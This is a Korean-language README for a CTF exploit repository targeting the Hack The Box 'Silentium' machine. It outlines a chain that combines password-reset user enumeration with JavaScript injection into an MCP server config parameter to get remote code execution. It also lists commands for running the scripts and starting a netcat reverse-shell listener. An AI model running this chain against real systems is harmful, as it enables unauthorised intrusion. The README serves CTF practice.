
익스플로잇 Silentium HTB-CTF
이 저장소는 Hack The Box의 Silentium 머신에 대한 완전한 익스플로잇 체인을 포함합니다. 이 익스플로잇은 사용자 열거와 JavaScript 주입을 포함한 2단계 취약점을 이용하여 **원격 코드 실행(RCE)**을 달성합니다.
취약점 체인은 정보 공개 결함과 심각한 코드 주입으로 구성됩니다. 먼저 비밀번호 재설정 버그를 통해 유효한 사용자를 열거함으로써 customMCP 엔드포인트를 공격하는 데 필요한 컨텍스트를 얻습니다. RCE는 mcpServerConfig 매개변수에 악성 JavaScript 함수를 주입함으로써 달성되며, 이 함수는 Node.js 백엔드에서 실행됩니다.
Python 3와 Bash가 설치되어 있어야 하며, 다음 라이브러리가 필요합니다:
pip install requests
열거 스크립트(Bash)를 실행하여 유효한 계정을 찾습니다 (users.txt 필요):
python3 CVE-2025-58434.py
로컬 머신에서 Netcat 리스너를 시작합니다:
nc -lvnp 4444
대상, 자신의 IP, 및 획득한 API 키를 제공하여 Python 스크립트를 실행합니다:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
이 스크립트는 교육 목적 및 CTF 환경 내에서의 공인된 침투 테스트만을 위해 작성되었습니다. 사전 허가 없이 대상을 접근하거나 공격하는 것은 불법입니다.
도전 과제: Silentium (Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528
| 인수 | 설명 | 필수 여부 |
|---|
| -t, --target | 대상 호스트 | 예 |
| -k, --key | API Bearer Token | 예 |
| -l, --lhost | 사용자 리스너 IP (VPN) | 예 |
| -p, --lport | 사용자 리스너 포트 | 예 |